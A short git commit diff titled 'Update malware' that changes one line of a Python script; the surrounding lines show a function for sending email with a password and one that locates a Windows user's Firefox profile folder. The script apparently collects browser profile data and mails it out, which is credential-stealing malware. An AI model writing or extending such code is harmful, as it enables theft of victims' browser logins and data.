Update malware

This commit is contained in:
Manuel Vergara 2024-02-01 01:26:21 +01:00
parent 21313f990b
commit d1a05d481b

View File

@ -61,7 +61,7 @@ def send_email(subject, body, sender, recipients, password):
def get_firefox_profiles(username):
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
try:
profiles = [profile for profile in os.listdir(